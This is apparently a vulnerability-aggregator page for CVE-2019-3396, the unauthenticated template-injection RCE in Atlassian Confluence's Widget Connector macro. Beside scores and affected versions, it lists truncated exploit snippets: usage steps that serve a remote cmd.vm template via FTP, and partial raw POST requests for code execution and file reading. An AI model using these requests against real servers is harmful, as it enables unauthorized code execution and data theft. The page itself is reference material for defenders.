Published: 25/03/2019 Updated: 13/12/2021

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 prior to 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 prior to 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 prior to 6.14.2 (the fixed version for 6.14.x), allows remote malicious users to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

Vulnerable Product	Search on Vulmon	Subscribe to Product
atlassian confluence
atlassian confluence server

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remo ...

Atlassian Confluence version 6121 suffers from a Widget Connector Macro template injection vulnerability ...

Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution Authentication is not required to exploit this vulnerability By default, ...

cve-2019-3396 Unauthenticated Confluence RCE (cve-2019-3396) setup exploit libraries bundle install run ┌──(user㉿hostname)-[~/path/to/cve-2019-3396] └─$ ruby cve-2019-3396rb exploit -> CVE-2019-3396 Author -> Abdallah Mohamed Elsharif Greetz to Ghost5egy and Hamza Abdulrahma

TEST

CVE-2019-3396TEST TEST

https://github.com/Yt1g3r/CVE-2019-3396_EXP.git

test1 githubcom/Yt1g3r/CVE-2019-3396_EXPgit

CVE-2019-3396

CVE-2019-3396_Confluence All documentation is in script file This exploit is also part of Exploit Database maintained by Offensive Security Screenshots

一些漏洞检测/利用脚本

概述该项目用于存放一些平时写的漏洞检测/利用脚本，不出意外会持续更新。已有POC thinkphp v5 RCE漏洞 Confluence RCE漏洞，编号CVE-2019-3396 Weblogic wls async unserialization RCE漏洞，编号CVE-2019-2795 Apache Shiro RCE漏洞

TEST

CVE-2019-3396TEST TEST

CVE-2019-3396

Confluence Widget Connector path traversal (CVE-2019-3396)

confluence_CVE-2019-3396

Confluence Widget Connector path traversal (CVE-2019-3396)

CVE-2019-3396 Confluence Widget Connector path traversal (CVE-2019-3396) RCE POC POST /rest/tinymce/1/macro/preview HTTP/11 Host: xxxx Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/50 (X11; Linux x86_64; rv:600) Gecko/20100101 Firefox/600 Content-Type: application/json; charset=utf-8 Referer: xxxx/pages/resumedraftaction?draf

Confluence Widget Connector path traversal (CVE-2019-3396)

CVE-2019-3396 漏洞验证txt与模板文件。

CVE-2019-3396-confluence-poc 漏洞验证txt与模板文件。

CVE-2019-3396 confluence SSTI RCE

CVE-2019-3396_EXP CVE-2019-3396 confluence SSTI RCE 1、put the cmdvm on your website (must use ftp or https ,http doesn't work ) 2、modify RCE_exppy ，change the filename = 'ftp://1111/cmdvm' （python -m pyftpdlib -p 21） 3、python REC_exppy testwiki_testcc:8080 "whoami" $ python REC_exppy testwiki_testcc:8080 "id&q

Confluence 未授权 RCE (CVE-2019-3396) 漏洞

CVE-2019-3396 Confluence 未授权 RCE (CVE-2019-3396) 漏洞坑点：有些版本需要加Referer才能成功 File Read POST /rest/tinymce/1/macro/preview HTTP/11 Host: 101020181 User-Agent: Mozilla/50 (Windows NT 100; Win64; x64; rv:550) Gecko/20100101 Firefox/550 Accept: text/plain, */*; q=001 Accept-Language: zh-CN,zh;q=08,en-US;q=05,en;q=03 Accept-Encoding: g

一些漏洞检测/利用脚本

confluence ssrf malware cleaner

Confluence ssrf 보안취약점 malware클린 툴(kerberods) 컨플루언스의 보안 취약점을 이용한 ssrf 공격때문에 짜증나서 만들어봄 컨플루언스 보안 권고 메일 전문 보기(한국어 번역) CVE-2019-3396 위젯 커넥터 (Widget Connector) 취약점을 공격 하는 적극적인 익스플로잇 입니다 ( Confluence Security Advisory -

InfosecBookmarks Organizando os bookmarks que acumulei no Chrome Bug Bounty Methodology WebHacking Recon Tools Awesome Lists Bugs Finding Subdomain Takeover Finding Race Conditions Finding Open Redirections Finding XXE Finding RCE Finding SSRF Finding XSS Finding CSRF Finding SQLi Finding IDOR Mobile Tools CheatSheet Mobile Writeups API Test Labs WriteUps Subdomain

Confluence（<install-directory>/confluence/WEB-INF/）文件读取漏洞

CVE-2019-3394 Confluence（install-directory>/confluence/WEB-INF/）文件读取漏洞 BurpSuite Request vuln_url 101020166:8090/rest/api/content/65610?status=draft PUT /rest/api/content/65610?status=draft HTTP/11 Host: 101020166:8090 User-Agent: Mozilla/50 (Windows NT 100; Win64; x64; rv:550) Gecko/20100101 Firefox/550 Accept: application/json, text/ja

MATA: Multi-platform targeted malware framework

Securelist • GReAT • 22 Jul 2020

As the IT and OT environment becomes more complex, adversaries are quick to adapt their attack strategy. For example, as users’ work environments diversify, adversaries are busy acquiring the TTPs to infiltrate systems. Recently, we reported to our Threat Intelligence Portal customers a similar malware framework that internally we called MATA. The MATA malware framework possesses several components, such as loader, orchestrator and plugins. This comprehensive framework is able to target Window...

CVE-2019-3396

Vulnerability Summary

Vulnerability Trend

Exploits

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect